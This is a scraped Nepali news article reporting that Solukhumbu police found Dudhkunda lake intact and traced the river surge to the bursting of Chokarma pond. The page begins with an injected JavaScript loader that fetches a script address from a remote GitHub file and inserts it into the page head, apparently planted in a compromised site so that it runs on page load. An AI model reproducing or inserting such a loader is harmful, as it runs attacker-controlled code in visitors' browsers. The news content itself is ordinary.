;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सोलुखुम्बुमा दुधकुण्ड नफुट्ने प्रहरीको निष्कर्ष : चोकर्मा पोखरी फुटेको प्रतिवेदन् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सोलुखुम्बुमा दुधकुण्ड नफुट्ने प्रहरीको निष्कर्ष : चोकर्मा पोखरी फुटेको प्रतिवेदन्
जुनेली बिशेष

सोलुखुम्बुमा दुधकुण्ड नफुट्ने प्रहरीको निष्कर्ष : चोकर्मा पोखरी फुटेको प्रतिवेदन्

अविरल बर्षा भएर पानीको बहाव बढेपछि ठूलो आवाजसहित पोखरी फुटेको आवज आएको

साउन ३२,

सोलुखुम्बु । जिल्ला प्रहरी कार्यालय सोलुखुम्बुले नुम्बुर हिमालको काखमा रहेको दुधकुण्डसहित अन्य पोखरी तत्काल फुट्ने सम्भावना नरहेको निष्कर्ष निकालेको छ। साउन २३ बिहान दुधकुण्ड पोखरी मुहान भई बग्ने सोलुखोलामा पानीको बहाव बढ्नुको कारण खोज्न त्यस क्षेत्र पुगेको प्रहरी टोलीको स्थलगत अध्ययनपछि शनिबार उक्त प्रतिवेदन सार्वजानिक गरेको हो।

साविककै अवस्थामा रहेको दुधकुण्ड ताल फुटेको भन्ने कुरा हल्ला रहेको भए पनि सोही तालको उत्तरतर्फ करिब २० किलोटिरमा रहेको चोकर्मा पोखरी फुट्दा खोलामा पानीको बहाव बढेको प्रहरीले पुष्टि गरेको छ। निरन्तरको वर्षातले पोखरीमा पानीको बहाव बढेको र पश्चि तर्फ कम्जोर रहेको चार मटिर भाग कटान गरी फुटेको प्रहरी निरीक्षक मन्दिप चौहानले जानकारी दिए।

साउन २२ राति अविरल बर्षा भएर पानीको बहाव बढेपछि ठूलो आवाजसहित पोखरी फुटेको त्यस क्षेत्रमा रहेका लाक्पा लामाले बताए। साउन २३ बिहान सोलुु खोलामा पानीको बहाव उच्च भएर बस्ती क्षेत्रमा पसेपछि जोखिम बढेको भन्दै तत्काल स्थलगत अध्ययन गर्न माग गरेका थिए। प्रदेश सांसद तथा नेकपा प्रदेश १ संसदिय दलका प्रमुख सचेतक बुद्धिकुमार राजभण्डारीसहितको टोलीले हेलिकोप्टरबाट स्थलगत अध्ययनमा जाने योजना बनाएको भए पनि मौसम प्रतिकुल हुँदा सफल भएको थिएन।

मौसम प्रतिकूल भएपछि साउन २८ मा सल्लेरीबाट प्रहरी टोली दुधकुण्ड क्षेत्र गएको थियो। सदरमुकाम सल्लेरीदेखि ६० कोष उत्तरतर्फ ४५०० मिटर उचाईमा दुधकुण्ड पोखरी पर्छ। समुन्द्र सतहदेखि ५ हजार ६५० मिटरको उचाइमा चोकर्मा पोखरी पर्छ। उक्त पोखरी फुटेर पानी बग्दा दुईवटा चौरी गोठ तीनवटा काठे साँघु बगाएको भए पनि उक्त क्षतिबारे प्रहरीले केहीपनि खुलाएको छैन।file Photo

फेसबुक प्रतिक्रियाहरु